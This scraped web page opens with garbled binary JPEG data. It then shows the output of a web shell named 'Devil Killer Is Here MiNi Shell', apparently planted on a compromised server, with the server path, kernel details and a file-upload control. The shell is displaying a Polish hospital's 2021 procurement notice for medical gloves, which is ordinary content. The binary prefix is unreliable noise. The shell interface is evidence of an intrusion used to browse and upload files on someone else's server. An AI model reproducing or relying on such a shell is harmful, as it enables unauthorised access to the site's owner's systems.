JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210928/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210928/0019476402-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa rękawic nitrylowych, lateksowych, chirurgicznych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Szpital Grochowski im. dr med. Rafała Masztaka Spółka z ograniczoną odpowiedzialnością</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 002153989</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Grenadierów 51/59</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">04-073</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">mkosinski@grochowski.waw.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.grochowski.waw.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa rękawic nitrylowych, lateksowych, chirurgicznych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6ced7945-2044-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00194764</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-09-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://szpitalgrochowski.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://szpitalgrochowski.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">zgodnie z zapisami SWZ</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://szpitalgrochowski.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacje dotyczące obowiązku informacyjnego RODO szczegółowo opisane w SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Informacje dotyczące obowiązku informacyjnego RODO szczegółowo opisane w SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZPK/18/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa rękawic nitrylowych. Zamówienie będzie realizowane poprzez sukcesywne dostawy asortymentu do siedziby Zamawiającego w ilościach odpowiadających bieżącym potrzebom Zamawiającego. Zamawiający określił zakres ilościowy oraz szczegółowy opis asortymentu w załączniku nr 2.1 do SWZ (formularz asortymentowo-cenowy). <br/>3.	Zamawiający określił zakres ilościowy oraz szczegółowy opis asortymentu <br/>w załączniku nr 2.1 – 2.2 do SWZ (formularz asortymentowo-cenowy). <br/><br/>Zamawiający wymaga rękawic diagnostycznych nitrylowych bezpudrowych w ilości 16200 opakowań po 100 szt. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">18424000-7 - Rękawice</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">18424300-0 - Rękawice jednorazowe</p> <p class="mb-0">33140000-3 - Materiały medyczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">2.	Kryteriami oceny ofert, jakimi będzie się kierował Zamawiający, będą: cena brutto oferty, z uwzględnieniem ewentualnych poprawek oczywistych omyłek rachunkowych – waga 80% (80 pkt maksymalnie) oraz kryterium ocena jakościowa – waga 20% (20 pkt maksymalnie). <br/>3.	Punkty przyznawane w kryteriach będą liczone według następującego wzoru:<br/>LP kryterium cena = (Cn /Cb) * W<br/>gdzie:<br/>LP – liczba punktów, Cn – cena najniższa spośród wszystkich ofert niepodlegających odrzuceniu; Cb – cena badanej oferty; W – waga kryterium = 80. <br/><br/> LP kryterium ocena jakościowa = OJ bad <br/>gdzie:<br/>LP – liczba punktów, OJ bad – ocena jakościowa w badanej ofercie niepodlegającej odrzuceniu; Maksymalna ilość punktów do uzyskania = 20. <br/>Dostarczone rękawice (próbki) zostaną przebadane przez Komisję Przetargową, która na podstawie ankiety dokona oceny jakości. Sposób oceny przyznanych punktów jest podana <br/>w tabeli:<br/>Tabela oceny w kryterium jakości<br/>Lp.	Przedmiot oceny	Ilość pkt	Punktacja<br/>1.	Odporność na uszkodzenia mechaniczne (rozdarcie)	0-4	0 pkt – rękawice pękają, rozrywają się 4 pkt – rękawice nie pękają, nie rozrywają się<br/>2. Brak zgrubień, pęcherzy i zanieczyszczeń mechanicznych	0-3	0 pkt – optycznie można zobaczyć zgrubienia, pęcherze lub zanieczyszczenia mech.<br/>3 pkt – wizualna gładkość<br/>3. Chwytność i czucie	0-4	0 pkt – chwytność ograniczona, mała elastyczność (brak pewności chwytu narzędzia w ręku) 4 pkt – dobra chwytność i elastyczność (narzędzia pewnie trzymane w ręku przez użytkownika)<br/>4. Komfort użytkowania (nakładanie /zdejmowanie)	0-6 - czy w trakcie nakładania nie ma oporu (0-3) - czy rękawice nie są po sklejane (0-3)<br/>5.	Rozciągliwość i elastyczność	0-3	W stopniu zapewniającym wygodę <br/>i mniejsze zmęczenie dłoni (0-3)<br/>4.	Za najkorzystniejszą ofertę, odpowiednio dla każdej części zamówienia, uznana zostanie ta, która uzyska łącznie najwyższą liczbę punktów uzyskanych za oba kryteria oceny wg wzoru: <br/>Liczba punktów = LPkryterium cena + LPkryterium ocena jakościowa</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Ocena jakościowa</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa rękawic lateksowych i chirurgicznych. Zamówienie będzie realizowane poprzez sukcesywne dostawy asortymentu do siedziby Zamawiającego w ilościach odpowiadających bieżącym potrzebom Zamawiającego. Zamawiający określił zakres ilościowy oraz szczegółowy opis asortymentu w załączniku nr 2.2 do SWZ (formularz asortymentowo-cenowy). <br/>Rękawice diagnostyczne ochronne lateksowe bezpudrowe - - 50 opakowań po 100 szt.<br/>Rękawice chirurgiczne sterylne, bezlateksowe bezpudrowe - 300 par. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33141420-0 - Rękawice chirurgiczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">18424300-0 - Rękawice jednorazowe</p> <p class="mb-0">33140000-3 - Materiały medyczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">2.	Kryteriami oceny ofert, jakimi będzie się kierował Zamawiający, będą: cena brutto oferty, z uwzględnieniem ewentualnych poprawek oczywistych omyłek rachunkowych – waga 80% (80 pkt maksymalnie) oraz kryterium ocena jakościowa – waga 20% (20 pkt maksymalnie). <br/>3.	Punkty przyznawane w kryteriach będą liczone według następującego wzoru:<br/>LP kryterium cena = (Cn /Cb) * W<br/>gdzie:<br/>LP – liczba punktów, Cn – cena najniższa spośród wszystkich ofert niepodlegających odrzuceniu; Cb – cena badanej oferty; W – waga kryterium = 80. <br/><br/> LP kryterium ocena jakościowa = OJ bad <br/>gdzie:<br/>LP – liczba punktów, OJ bad – ocena jakościowa w badanej ofercie niepodlegającej odrzuceniu; Maksymalna ilość punktów do uzyskania = 20. <br/>Dostarczone rękawice (próbki) zostaną przebadane przez Komisję Przetargową, która na podstawie ankiety dokona oceny jakości. Sposób oceny przyznanych punktów jest podana <br/>w tabeli:<br/>Tabela oceny w kryterium jakości<br/>Lp.	Przedmiot oceny	Ilość pkt	Punktacja<br/>1.	Odporność na uszkodzenia mechaniczne (rozdarcie)	0-4	0 pkt – rękawice pękają, rozrywają się 4 pkt – rękawice nie pękają, nie rozrywają się<br/>2. Brak zgrubień, pęcherzy i zanieczyszczeń mechanicznych	0-3	0 pkt – optycznie można zobaczyć zgrubienia, pęcherze lub zanieczyszczenia mech.<br/>3 pkt – wizualna gładkość<br/>3. Chwytność i czucie	0-4	0 pkt – chwytność ograniczona, mała elastyczność (brak pewności chwytu narzędzia w ręku) 4 pkt – dobra chwytność i elastyczność (narzędzia pewnie trzymane w ręku przez użytkownika)<br/>4. Komfort użytkowania (nakładanie /zdejmowanie)	0-6 - czy w trakcie nakładania nie ma oporu (0-3) - czy rękawice nie są po sklejane (0-3)<br/>5.	Rozciągliwość i elastyczność	0-3	W stopniu zapewniającym wygodę <br/>i mniejsze zmęczenie dłoni (0-3)<br/>4.	Za najkorzystniejszą ofertę, odpowiednio dla każdej części zamówienia, uznana zostanie ta, która uzyska łącznie najwyższą liczbę punktów uzyskanych za oba kryteria oceny wg wzoru: <br/>Liczba punktów = LPkryterium cena + LPkryterium ocena jakościowa</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Ocena jakościowa</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający wymaga od Wykonawców następujących podmiotowych środków dowodowych, które Wykonawcy będą zobowiązani złożyć na wezwanie Zamawiającego (nie należy ich składać wraz z ofertą):<br/>1) oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076<br/>i 1086), z innym wykonawcą, który złożył odrębną ofertę lub ofertę częściową, albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami i/lub informacjami potwierdzającymi przygotowanie oferty lub oferty częściowej niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wymaga złożenia oświadczenia, o którym mowa w art. 125 ust. 1 ustawy</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1.	Zamawiający wymaga złożenia przedmiotowych środków dowodowych. <br/>2.	Przedmiotowe środki dowodowe Wykonawcy zobowiązani są złożyć wraz z ofertą. <br/>3.	Wykonawca zobowiązany jest do złożenia następujących przedmiotowych środków dowodowych:<br/>1)	w przypadku części nr 1 zamówienia (złożenia oferty na część nr 1 zamówienia) wymagane przedmiotowe środki dowodowe dotyczące rękawic nitrylowych:<br/>a)	raport producenta do serii rękawic nitrylowych – wymóg badań nie starszych niż 3 lata przed upływem terminu składania ofert dotyczy dokumentów potwierdzających zgodność z normą EN 455-1,2,3 i 4;<br/>b)	spełnienie Norm EN 374-1, (z wyłączeniem punktu 5.3.2), EN 374-2, EN 374-3, EN 420 – potwierdzone dokumentami producenta w pełni aktualnymi na dzień składania ofert;<br/>c)	odporność na przenikanie wirusów – potwierdzona raportem z badań jednostki niezależnej zgodnie z normą EN 16523-1, nie starszych niż 3 lata przed upływem terminu składania ofert;<br/>d)	certyfikat Badania Typu WE w kategorii III Środków Ochrony Indywidualnej dotyczący oferowanych rękawic;<br/>e)	rękawice wolne od szkodliwych ftalanów – potwierdzone deklaracją wytwórcy lub badaniami jednostki niezależnej;<br/>f)	próbki oferowanego asortymentu (przedmiotu zamówienia) – po jednym opakowaniu oferowanych rękawic nitrylowych w rozmiarach M i L (łącznie dwa opakowania po jednym w każdym rozmiarze);<br/>2) w przypadku części nr 2 zamówienia (złożenia oferty na część nr 2 zamówienia) Wymagane przedmiotowe środki dowodowe dotyczące rękawic chirurgicznych:<br/>a)	raport producenta do serii rękawic chirurgicznych – wymóg badań nie starszych niż 3 lata przed upływem terminu składania ofert – dotyczy dokumentów potwierdzających zgodność z normą EN 455-1,2,3;<br/>b)	spełnienie Norm EN 374-1, (z wyłączeniem punktu 5.3.2), EN 374-2, EN 374-3, EN 420 – potwierdzone dokumentami producenta w pełni aktualnymi na dzień składania ofert;<br/>c)	odporność na przenikanie wirusów – potwierdzona raportem z badań jednostki niezależnej zgodnie z normą ASTM F 1671/EN 374-5:2016;<br/>d)	zawartość protein – potwierdzona raportem z badań producenta do serii dostarczonych próbek nie starszych niż 3 lata przed upływem terminu składania ofert;<br/>e)	próbki oferowanego asortymentu (przedmiotu zamówienia) – po jednym opakowaniu oferowanych rękawic chirurgicznych <br/>w rozmiarach 6,5 i 7,0 (łącznie dwa opakowania po jednym w każdym rozmiarze);<br/>3)	w przypadku części nr 2 zamówienia (złożenia oferty na część nr 2 zamówienia) Wymagane przedmiotowe środki dowodowe dotyczące rękawic diagnostycznych lateksowych bezpudrowych:<br/>a)	raport producenta do serii rękawic diagnostycznych lateksowych bezpudrowych – wymóg badań nie starszych niż 3 lata przed upływem terminu składania ofert – dotyczy dokumentów potwierdzających zgodność z normą EN 455-1,2,3 i 4;<br/>b)	spełnienie Norm EN 374-1, (z wyłączeniem punktu 5.3.2), EN 374-2, EN 374-3, EN 420 – potwierdzone dokumentami producenta w pełni aktualnymi na dzień składania ofert;<br/>c)	odporność na przenikanie wirusów – potwierdzona raportem z badań jednostki niezależnej zgodnie z normą EN 16523-1, nie starszych niż 3 lata przed upływem terminu składania ofert;<br/>d)	certyfikat Badania Typu WE w kategorii III Środków Ochrony Indywidualnej dotyczący oferowanych rękawic;<br/>e)	rękawice wolne od szkodliwych ftalanów – potwierdzone deklaracją wytwórcy lub badaniami jednostki niezależnej;<br/>f)	próbki oferowanego asortymentu (przedmiotu zamówienia) – po jednym opakowaniu oferowanych rękawic diagnostycznych lateksowych bezpudrowych w rozmiarach M i L (łącznie dwa opakowania po jednym w każdym rozmiarze). <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Zamawiający przewiduje możliwość uzupełnienia przedmiotowych środków dowodowych (w tym próbek), jeśli Wykonawca nie złoży przedmiotowych środków dowodowych lub złożone przedmiotowe środki dowodowe będą niekompletne. Wykonawca może uzupełnić przedmiotowe środki dowodowe, ale tylko na wezwanie Zamawiającego.<br/>Przedmiotowe środki dowodowy, jeżeli służą przyznaniu punktów zgodnie<br/>z określonymi kryteriami oceny ofert, mogą być uzupełnione tylko w celu potwierdzenia braku podstaw do odrzucenia oferty, ale nie mogą być uzupełnione, aby służyć uzyskaniu punktów w kryteriach oceny ofert. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Próbki składa się w formie fizycznej, przed upływem terminu składania ofert. Próbka musi być dostarczona (złożona) do siedziby Zamawiającego – adres: ul. Grenadierów 51/59, 04-073 Warszawa, Pawilon IV, parter, Sekretariat Zarządu. Próbka złożona po upływie terminu składania ofert nie będzie uwzględniana do oceny w kryterium jakościowym, a oferta w tym kryterium otrzyma 0 punktów (zero). Próbka musi potwierdzić wszystkie wymagania stawiane przez Zamawiającego względem asortymentu.<br/>Złożona próbka musi być w opakowaniu oraz opisana w następujący sposób: a) dane Wykonawcy, b) nazwa asortymentu (z podaniem nr części / zadania i pozycja w danej części zamówienia), c) nr sprawy: ZPK/18/2021. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie 